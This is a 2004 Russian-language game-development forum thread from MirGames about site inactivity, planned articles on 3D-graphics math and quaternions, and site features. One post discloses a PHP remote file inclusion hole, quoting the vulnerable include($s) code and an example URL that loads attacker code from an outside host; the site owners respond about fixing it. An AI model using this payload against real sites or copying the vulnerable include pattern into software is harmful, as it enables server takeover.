{{notification.text}}

MirGames

Dan
The One
26.10.04 01:48
0
Уже долгое время на сайте нет обновлений!
Тоже самое происходит с большенством проектов.

Это временно, или сайт действительно умирает :unsure: ?
#41
06.11.04 15:22
0
Universal


Ну надо посмотреть , что ты там написал, совсем уж сложные вещи писать бес смыла, могу пореккомендовать несколько хороших справочников по высшей математике, там уж без меня всё отлично рассписали.....
#42
Проект "Канализация"
06.11.04 17:11
0
Надо не просто расписать как считается к примеру DotProduct, но и его математический смысл (v1 dot v2 дает вектор нормали), укзать некомутативные операции, показать куда деется 4-ый компонент вектора, описать потерю точности при матричных операциях и зачем нужны кватернионы... и .т.п.
Вот такая статья имхо была бы очень полезна...
#43
MirGames Dev
07.11.04 13:36
0
Цитата
Форум гад глючит дико в отличии Дельфимастерского

Поставлю новую версию, как только найду ее. Свой форум в стиле Дипа или Мастаков делать не слишком меня тянет.
Цитата
Вот такая статья имхо была бы очень полезна...

Вообще идея хорошая. Расширения - вещь вообще классная, если разбираешься в них, и если есть хорошее описание.

Информационный проект по расширениям - вещь нужная. Создать раздел на сайте - не сложно. Выделить поддомен - ещё проще. Самое сложное - накопать всю инфу и выложить.
#44
__
07.11.04 15:03
0
Про баг - включение произвольного пхп кода на страницах в виде:
news.php?s=vasa.html
и кодом вроде
<? include($s)?>
Можно включить файл с любым кодом
news.php?s=http://fuck.me.com/hak.inc
А дальше надо думать... некогда :)
Мыл на god`е баг нем и ещё где-то, просто полистай странички...
#45
Проект "Канализация"
07.11.04 15:30
0
Цитата

Самое сложное - накопать всю инфу и выложить.

уже копаю...
#47
Почётный лектор
07.11.04 22:44
0
В статье у меня кое-чего из перечисленного есть.
А вот кватернионов всяких нету (я пока даже не знаю шо сие такое, я ведь только 1-й курс... А сейчас только ноябрь)
Написал не просто как справочник по высшей математике, а как все это связано с 3D графикой.

Daddy выложит, сами почитайте, оцените.
#48
MirGames Dev
08.11.04 14:26
0
Цитата
Про баг - включение произвольного пхп кода на страницах в виде:

Основной сайт не пробить... А за поддомены я не отвечаю... Хотя претензии предъявлю.
#49
Бывший Папа
08.11.04 16:13
0
2MeF, Daddy сайт не умрет по крайней мере еще 1,5 года :) Ибо я совсем недавно оплатил ;) Теперь можно со спокойной душей заниматься заполнением. Сейчас разберусь с крахом на работе и вернусь полноценно в строй, может напишу статейки по скелетной анимации 2D моделей.
#50
Почётный лектор
08.11.04 22:45
0
Сорри за хрени с безопасностью на моем сайте.

Че-нть придумаю - исправлю.
Думаю, придумаю.
Как время будет.
#51
MirGames Dev
09.11.04 21:16
0
Цитата
уже копаю...

Как накопаешь - слей плиз на мыло asbulat@mail.ru...
Было бы неплохо, если бы часть инфы я уже получил... ;)
#52
Проект "Канализация"
10.11.04 09:39
0
Ну собственно, сами спеки то есть... Надо только все это безобразие расортировать и сделать генератор хтмл

ЗЫ: я понял, что мне в оформлении статей не нравится - вставки кода надо делать моноширинным шрифтом (courier new например)
#53
MirGames Dev
10.11.04 15:22
0
Цитата
я понял, что мне в оформлении статей не нравится - вставки кода надо делать моноширинным шрифтом (courier new например)

Ладно, сделал моноширинный. Сделал всё так, как будет кусок кода прямо из Delphi вырвали...
Цитата
Ну собственно, сами спеки то есть...

Ну значит ждемс...
#54
Dan
The One
11.11.04 10:41
0
Почему с сайта убрали проекты? Может большенство из них и не обновляются, но иногда хочется посмотреть чего делают люди! :blink:

Может стоит создать отдельную ссылку на проекты...
#55
11.11.04 13:53
0
Да, Спос напишу про скелетную анимацию =)
#56
MirGames Dev
11.11.04 14:57
0
Цитата
Почему с сайта убрали проекты?

Убрали - значит вернем...
#57
MirGames Dev
12.11.04 18:28
0
Цитата
Убрали - значит вернем...

Обещал вернуть - вернул. Конечно, большая часть проектов уже загнулась ;)
#58
Почётный лектор
12.11.04 18:41
0
Чтобы тут ничего о нашем проекте не подумали - медленно пишем двиг.
Дошли до текстур.
#59
MirGames Dev
12.11.04 18:43
0
Цитата
Чтобы тут ничего о нашем проекте не подумали - медленно пишем двиг.
Дошли до текстур.

Это лучше в новостях напиши... ;)
#60
13.11.04 01:37
0
Vasiliy


Это можно....

Про кватернионы и зачем они нужны - статей навалом.
#{{post.Index}}
{{post.Author.Login}}
{{post.CreatedDate | date:'dd.MM.yy HH:mm'}}
{{post.VotesRating}}
Отредактировано: {{post.UpdatedDate | date:'dd.MM.yy HH:mm'}}